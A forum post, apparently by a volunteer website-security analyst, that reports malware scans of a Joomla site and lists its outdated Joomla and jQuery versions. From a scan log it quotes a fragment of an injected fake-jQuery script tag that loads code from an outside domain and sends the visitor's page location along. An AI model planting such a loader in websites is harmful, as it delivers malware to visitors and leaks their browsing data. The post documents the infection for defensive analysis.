Is this malware javascript being detected?

See: http://urlquery.net/report.php?id=1493050745247
See 6 to flag: https://www.virustotal.com/pl/url/76d6e04951eccc77b79e2f687864067ad89296d1278b21aeea9c4cb502e0ed63/analysis/1493053020/
36 instances of malicious file: https://quttera.com/detailed_report/sb3.nomade.vitto.one

CMS issue: Web application version:
Joomla Version 3.5.1 found at: hxtp://sb3.nomade.vitto.one/administrator/manifests/files/joomla.xml
Joomla version outdated: Upgrade required.
Outdated Joomla Found: Joomla under 3.6.4

IP flagged here: https://zerocert.org/lab/nodeview/?day=1&z=wordpress&info=keyword

See the javascript code errors:

found JavaScript
error: line:5: SyntaxError: missing variable name:
error: line:5:
error: line:5: ^
error: line:3: SyntaxError: missing ; before statement:
error: line:3: script type=“text/javascript” src="’ + ‘htxp:/affordableftp.com/js/jquery.min.php’ + ‘?key=b64’ + ‘%26campaign=’ + ‘snt2014’ + ‘%26source=’ + window.location.host + ‘%26medium=’ + ‘%26content=’ + window.location + ‘%26term=’ + encodeU
error: line:3: ^
Invalid or restricted domain:
Threat Name: Web Attack: Fake Jquery Injection 2
Location: htxp://sb2.nomade.vitto.one/voir-toutes-les-annonces.html?view=advsearch&searchlay=&krquicksearch=1
and 67 more.

JQuery malware: -http://sb2.nomade.vitto.one
Detected libraries:
jquery - 1.9.1 : (active1) http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js
Info: Severity: medium
https://github.com/jquery/jquery/issues/2432
http://blog.jquery.com/2016/01/08/jquery-2-2-and-1-12-released/
jquery-migrate - 1.2.1 :- http://sb2.nomade.vitto.one/media/jui/js/jquery-migrate.min.js
Info: Severity: medium
http://bugs.jquery.com/ticket/11290
http://research.insecurelabs.org/jquery/test/
jquery - 1.11.3 : -http://sb2.nomade.vitto.one/media/jui/js/jquery.min.js
Info: Severity: medium
https://github.com/jquery/jquery/issues/2432
http://blog.jquery.com/2016/01/08/jquery-2-2-and-1-12-released/
(active) - the library was also found to be active by running code
3 vulnerable libraries detected

Same origin and sri-hash tag issues just for these vulnerable scripts:

And SRI-hash issues just for these vulnerable scripts: Scripts 2 issues
Tag Result

Missing SRI hash Missing SRI hash

polonus (volunteer website security analyst and website error-hunter)

HTML scan

https://www.virustotal.com/en/file/b9f3586510268c82a041d095be6dca035bd262de27c5a71eafc8b2585b115fcf/analysis/1493122003/

Hei Pondus,

Mange takk :wink:

polonus